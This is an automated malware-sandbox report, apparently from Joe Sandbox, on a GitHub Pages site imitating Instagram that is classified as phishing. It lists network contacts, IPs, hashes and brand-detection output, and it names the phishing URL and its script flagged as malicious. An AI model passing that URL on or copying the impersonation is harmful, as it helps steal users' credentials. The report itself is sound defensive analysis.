                                                                                                                            https://play-lh.googleusercontent.com/V3ZhQ8_Y0fpxU6raIoXNAtx_AE_IO71HDHgzJjN0vKZtKYwv41nr7WkNbILhGu5OHI5b=s64-rwfalse
                                                                                                                              unknown
                                                                                                                              https://play-lh.googleusercontent.com/uQ9hA-fPwMe3U8m0i1lqnLVLKObQWhygMvfHURGy-umOu6EJirFNDqFyiSSLfyb0KA=w526-h296-rwfalse
                                                                                                                                unknown
                                                                                                                                https://sayidanur.github.io/instagram.com/main.jstrue
                                                                                                                                  unknown
                                                                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3iMyQ4/yx/l/en_GB/yUeQb7xXYnw.jsfalse
                                                                                                                                    unknown
                                                                                                                                    https://connect.facebook.net/signals/config/1362649510502605?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112%2C199%2C198%2C200%2C205%2C206%2C207%2C203%2C195%2C131%2C133%2C162%2C194%2C196%2C121%2C156%2C144%2C150%2C188%2C189%2C128%2C231%2C115%2C125%2C126%2C232%2C164%2C118%2C234%2C165%2C135%2C122%2C153%2C147%2C113%2C127false
                                                                                                                                      unknown
                                                                                                                                      https://static.xx.fbcdn.net/rsrc.php/v3iNig4/y7/l/en_GB/79SeOVWXEcm.jsfalse
                                                                                                                                        unknown
                                                                                                                                        https://i.ytimg.com/vi/aP5mQIXxLCE/hqdefault.jpgfalse
                                                                                                                                          unknown
                                                                                                                                          https://play-lh.googleusercontent.com/GeIJA3m3_3mR1kSeB4G0rBs2Lb65AZcwW9HZmlSCFBxqD-BZyY0Q_MSCl_Mcy3-S2RY=s64-rwfalse
                                                                                                                                            unknown
                                                                                                                                            https://play-lh.googleusercontent.com/CgUPurtUp8SB709wsQcKLMv6JdIh1em0ka_58V69AorznLv42TV39etS2rt28wv9Rz8=w720-h405-rwfalse
                                                                                                                                              unknown
                                                                                                                                              https://play-lh.googleusercontent.com/lqq4t8D0lUEFIPQGIn9fZIxyulux127eqqYMK1aX58Xn9Kfd6xfXVCSRW72RMorVeyw=w648-h364-rwfalse
                                                                                                                                                unknown
                                                                                                                                                https://play-lh.googleusercontent.com/a/ACg8ocJZ_a0qI7f5pr9REiRB_V4G5VIHM_m0KU83eeL3o5d-9yiNCA=s32-rw-mofalse
                                                                                                                                                  unknown
                                                                                                                                                  https://play-lh.googleusercontent.com/FVQXdzxDphpLdMRqIc5kG4C_Dc4AEO7-9uKHPt85v5_6Sp3J4mTV1S6P3ipLEoK6lDer=s64-rwfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://play-lh.googleusercontent.com/3mFQ9TxTUpICP96ePMtgZTMmwXdLmfh4LROdo2pJ-d-RU4NBZ6JnIWeVp92DgpqxgRMu=s64-rwfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://play-lh.googleusercontent.com/xZ9aAAGs60bJitt4kftzG2JSgo6rpZoII33fpvOxT17217hebF4c57DA_NNns7pktTw=s64-rwfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/C5TXdJzIETO.jsfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/eFZD1KABzRA.pngfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://www.facebook.com/ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=3&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqMfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3ikJE4/yM/l/en_GB/H9hFVb-Q8_Q.jsfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://static.xx.fbcdn.net/rsrc.php/v3ixu44/yU/l/en_GB/Iud4PfRtk1i.jsfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3imlR4/y0/l/en_GB/JAH0JDr9qF3.jsfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://play-lh.googleusercontent.com/LW7xh2wtB12g50iQvEER_zZTcY4OLuT4PV-RhN2ums0B65opMFwcHdELAmXECB2CrGpM=w526-h296-rwfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/BLqydITNHiz.jsfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/BGMvuu7HwCF.jsfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/yK/r/lNInKxOqejp.jsfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                            https://stats.g.doubleclick.net/g/collectchromecache_753.2.drfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://messenger.com/chromecache_452.2.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://support.google.comchromecache_383.2.dr, chromecache_956.2.drfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://ampcid.google.com/v1/publisher:getClientIdchromecache_619.2.drfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://www.youtube.comchromecache_382.2.drfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://fontawesome.comchromecache_680.2.drfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://www.internalfb.com/intern/invariant/chromecache_933.2.dr, chromecache_554.2.drfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://www.instagram.comchromecache_811.2.dr, chromecache_957.2.drfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://is1-ssl.mzstatic.com/image/thumb/Features3/v4/68/2d/b7/682db7fa-e9d5-ec7d-c694-fa2b0bd4d15d/chromecache_382.2.drfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://policies.google.com/terms;target;_blank;class;cOP9Jcchromecache_697.2.drfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://is1-ssl.mzstatic.com/image/thumb/PurpleVideo221/v4/ce/c0/92/cec092b1-23e1-b4b4-d21a-a86074e9chromecache_382.2.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://www.capcut.com/clause/terms-of-servicechromecache_382.2.drfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://stats.g.doubleclick.net/j/collectchromecache_619.2.drfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://support.google.com/googleplay/?p=report_contentchromecache_713.2.dr, chromecache_461.2.drfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://is1-ssl.mzstatic.com/image/thumb/Features126/v4/ab/a2/60/aba26099-a4af-3549-e0f0-27d72ff767dchromecache_382.2.drfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://fburl.com/wiki/e0vmgfv2chromecache_866.2.drfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://www.google.com/tools/feedbackchromecache_390.2.dr, chromecache_360.2.drfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://git.io/fjulechromecache_564.2.dr, chromecache_816.2.drfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://is1-ssl.mzstatic.com/image/thumb/Purple221/v4/93/65/69/9365698a-8861-3219-065b-aea2043ac9a8/chromecache_382.2.drfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://instagram.com/chromecache_382.2.drfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://apis.google.com/js/api.jschromecache_804.2.dr, chromecache_795.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://is1-ssl.mzstatic.com/image/thumb/PurpleSource221/v4/92/56/e5/9256e528-a2d2-4c99-844e-1e1c33achromecache_382.2.drfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://is1-ssl.mzstatic.com/image/thumb/Purple22/v4/da/ea/2e/daea2ed3-5a5b-16e5-15b2-26d579fa6532/mchromecache_382.2.drfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://schema.orgchromecache_713.2.dr, chromecache_461.2.dr, chromecache_382.2.drfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://is1-ssl.mzstatic.com/image/thumb/PurpleSource122/v4/62/ea/16/62ea1604-eb2e-1371-11a4-d5dabd1chromecache_382.2.drfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://is5-ssl.mzstatic.comchromecache_382.2.drfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://connect.facebook.net/chromecache_683.2.dr, chromecache_913.2.drfalse
                                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://is1-ssl.mzstatic.com/image/thumb/Features111/v4/59/af/9e/59af9e68-220c-50d1-fb85-734b137d1e8chromecache_382.2.drfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://policies.google.com/privacychromecache_592.2.dr, chromecache_697.2.dr, chromecache_447.2.dr, chromecache_363.2.dr, chromecache_690.2.drfalse
                                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://is1-ssl.mzstatic.com/image/thumb/PurpleSource122/v4/b7/76/d6/b776d664-06a6-c170-021c-b889976chromecache_382.2.drfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://www.photogrid.app/chromecache_382.2.drfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://www.ftc.go.kr/selectBizOvrCommPop.do?apvPermMgtNo=2022%EA%B3%B5%EC%A0%950001chromecache_499.2.drfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://payments.sandbox.google.com/payments/v4/js/integrator.js?rk=1chromecache_586.2.dr, chromecache_667.2.drfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://play.google.comchromecache_383.2.dr, chromecache_956.2.drfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.google.com/log?format=json&hasfast=truechromecache_804.2.dr, chromecache_795.2.drfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://is1-ssl.mzstatic.comchromecache_382.2.drfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://is1-ssl.mzstatic.com/image/thumb/Purple211/v4/84/16/80/841680b1-3872-7fa5-37c4-35741395390c/chromecache_382.2.drfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                  142.250.185.246
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  157.240.0.6
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  32934FACEBOOKUSfalse
                                                                                                                                                                                                                                  142.250.181.238
                                                                                                                                                                                                                                  play.google.comUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  142.250.184.225
                                                                                                                                                                                                                                  googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  216.58.212.150
                                                                                                                                                                                                                                  play-lh.googleusercontent.comUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  216.58.212.174
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  157.240.252.35
                                                                                                                                                                                                                                  star-mini.c10r.facebook.comUnited States
                                                                                                                                                                                                                                  32934FACEBOOKUSfalse
                                                                                                                                                                                                                                  142.250.184.196
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  157.240.0.35
                                                                                                                                                                                                                                  facebook.comUnited States
                                                                                                                                                                                                                                  32934FACEBOOKUSfalse
                                                                                                                                                                                                                                  216.58.206.68
                                                                                                                                                                                                                                  www.google.comUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  157.240.251.9
                                                                                                                                                                                                                                  scontent.xx.fbcdn.netUnited States
                                                                                                                                                                                                                                  32934FACEBOOKUSfalse
                                                                                                                                                                                                                                  239.255.255.250
                                                                                                                                                                                                                                  unknownReserved
                                                                                                                                                                                                                                  unknownunknownfalse
                                                                                                                                                                                                                                  142.250.185.174
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  157.240.253.1
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  32934FACEBOOKUSfalse
                                                                                                                                                                                                                                  142.250.184.214
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  185.199.108.153
                                                                                                                                                                                                                                  sayidanur.github.ioNetherlands
                                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                                  157.240.253.35
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  32934FACEBOOKUSfalse
                                                                                                                                                                                                                                  142.250.186.86
                                                                                                                                                                                                                                  i.ytimg.comUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  157.240.251.35
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  32934FACEBOOKUSfalse
                                                                                                                                                                                                                                  104.17.25.14
                                                                                                                                                                                                                                  cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                  192.168.2.4
                                                                                                                                                                                                                                  192.168.2.6
                                                                                                                                                                                                                                  192.168.2.5
                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                  Analysis ID:1521986
                                                                                                                                                                                                                                  Start date and time:2024-09-29 06:52:05 +02:00
                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                  Overall analysis duration:0h 7m 4s
                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                  Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                  Sample URL:https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                  Number of analysed new started processes analysed:10
                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal64.phis.win@23/957@70/23
                                                                                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                  • Browse: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                  • Browse: https://apps.apple.com/uz/app/instagram/id389801252
                                                                                                                                                                                                                                  • Browse: https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=US
                                                                                                                                                                                                                                  • Browse: https://www.facebook.com/pages/create/?ref_type=registration_form
                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 142.250.186.67, 216.58.212.142, 74.125.206.84, 34.104.35.123, 142.250.186.170, 142.250.185.74, 216.58.212.170, 142.250.184.234, 142.250.181.234, 142.250.185.170, 172.217.16.138, 142.250.185.202, 142.250.186.42, 142.250.185.234, 142.250.184.202, 172.217.23.106, 142.250.185.138, 142.250.74.202, 142.250.185.106, 216.58.206.42, 4.245.163.56, 192.229.221.95, 52.165.164.15, 199.232.214.172, 172.217.18.106, 142.250.186.138, 172.217.18.10, 142.250.186.106, 142.250.186.74, 172.217.16.202, 216.58.206.74, 2.19.224.19, 20.242.39.171, 2.16.202.121, 95.101.54.216, 2.23.196.201, 23.201.254.30, 2.23.194.36, 93.184.221.240, 17.253.15.195, 17.253.15.203, 17.253.15.205, 17.253.15.210, 142.250.186.35, 142.250.186.99, 216.58.212.138, 142.250.185.227, 216.58.206.67, 142.250.185.67, 142.250.185.206, 142.250.186.168, 142.250.185.136, 142.250.74.195, 199.232.210.172, 142.250.186.78
                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): xp.itunes-apple.com.akadns.net, ssl.gstatic.com, slscr.update.microsoft.com, clientservices.googleapis.com, e17437.dsct.akamaiedge.net, clients2.google.com, ocsp.digicert.com, itunes.apple.com.edgekey.net, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, www.gstatic.com, wu-b-net.trafficmanager.net, www.google-analytics.com, apps-cdn.itunes-apple.com.akadns.net, fs.microsoft.com, content-autofill.googleapis.com, e6858.dscx.akamaiedge.net, amp-api-edge-cdn-lb.itunes-apple.com.akadns.net, edgedl.me.gvt1.com, www.apple.com.edgekey.net, a1437.dscq.akamai.net, clients.l.google.com, www.apple.com.edgekey.net.globalredir.akadns.net, js-cdn.music.apple.com, amp-api-edge.apps.apple.com, www.apple.com, wu.azureedge.net, xp.apple.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, xp.apple.com.edgekey.net, js-cdn-music-lb.itunes-apple.com.akadn
                                                                                                                                                                                                                                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                  • VT rate limit hit for: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                  No simulations
                                                                                                                                                                                                                                  InputOutput
                                                                                                                                                                                                                                  URL: https://sayidanur.github.io/instagram.com/ Model: jbxai
                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                  "brand":["Facebook",
                                                                                                                                                                                                                                  "Instagram"],
                                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                  "prominent_button_name":"",
                                                                                                                                                                                                                                  "text_input_field_labels":[",
                                                                                                                                                                                                                                      . ",
                                                                                                                                                                                                                                  ""],
                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                  URL: https://www.facebook.com/?locale=ru_RU Model: jbxai
                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                  "brand":["Facebook"],
                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                  "prominent_button_name":"",
                                                                                                                                                                                                                                  "text_input_field_labels":[],
                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                  URL: https://www.facebook.com/?locale=ru_RU Model: jbxai
                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                  "brand":["Facebook"],
                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                  "prominent_button_name":"",
                                                                                                                                                                                                                                  "text_input_field_labels":["    ",
                                                                                                                                                                                                                                  ""],
                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                  URL: https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=US Model: jbxai
                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                  "brand":["Instagram"],
                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                  "prominent_button_name":"",
                                                                                                                                                                                                                                  "text_input_field_labels":["Threads",
                                                                                                                                                                                                                                  "PREVIEW - Plan your Instagram",
                                                                                                                                                                                                                                  "UNUM -  "],
                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                  URL: https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=US Model: jbxai
                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                  "brand":["Instagram"],
                                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                                  "trigger_text":"Share with the people who get you",
                                                                                                                                                                                                                                  "prominent_button_name":"",
                                                                                                                                                                                                                                  "text_input_field_labels":["Threads",
                                                                                                                                                                                                                                  "PREVIEW - Plan your Instagram",
                                                                                                                                                                                                                                  "UNUM -  "],
                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                  URL: https://apps.apple.com/uz/app/instagram/id389801252 Model: jbxai
                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                  "brand":["Instagram"],
                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                  URL: https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=US Model: jbxai
                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                  "brand":["Instagram"],
                                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                                  "trigger_text":"PREVIEW - Plan your Instagram",
                                                                                                                                                                                                                                  "prominent_button_name":"Try for free",
                                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                  URL: https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=US Model: jbxai
                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                  "brand":["Instagram"],
                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                  URL: https://play.google.com/store/apps/details?id=net.wooga.junes_journey_hidden_object_mystery_game&pcampaignid=merch_published_cluster_promotion_battlestar_featured_games&hl=ru&gl=US Model: jbxai
                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                  "brand":["Beautiful Scenes"],
                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                  "trigger_text":"unknown",
                                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                  URL: https://play.google.com/store/apps/details?id=net.wooga.junes_journey_hidden_object_mystery_game&pcampaignid=merch_published_cluster_promotion_battlestar_featured_games&hl=ru&gl=US Model: jbxai
                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                  "brand":[],
                                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (821)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):7626
                                                                                                                                                                                                                                  Entropy (8bit):5.215559608926212
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:OtQ0m8mBOZgS9tn0Ll9829FAeHlVPrMNW:OtFuSD4829FAeHzPAW
                                                                                                                                                                                                                                  MD5:33AF753815E0763128B33C38F393AF19
                                                                                                                                                                                                                                  SHA1:FD81C07EDD497B91F91629687D2AB6976F287E17
                                                                                                                                                                                                                                  SHA-256:A7A8465112A5F495E5C95139568A59BF35B3116624A5861B71472070520D699E
                                                                                                                                                                                                                                  SHA-512:D5981A0D80035A3E0B8EFBE12B90C5E82A53F8C2CBC100001D344DC645B07A76DB3B75D863A5BB733F54B9E13B4C0A515B63041F50DCFC9AC750C092C436DBF5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/assets/chunk.26.d8fd25d7ba389f9fe03e.js
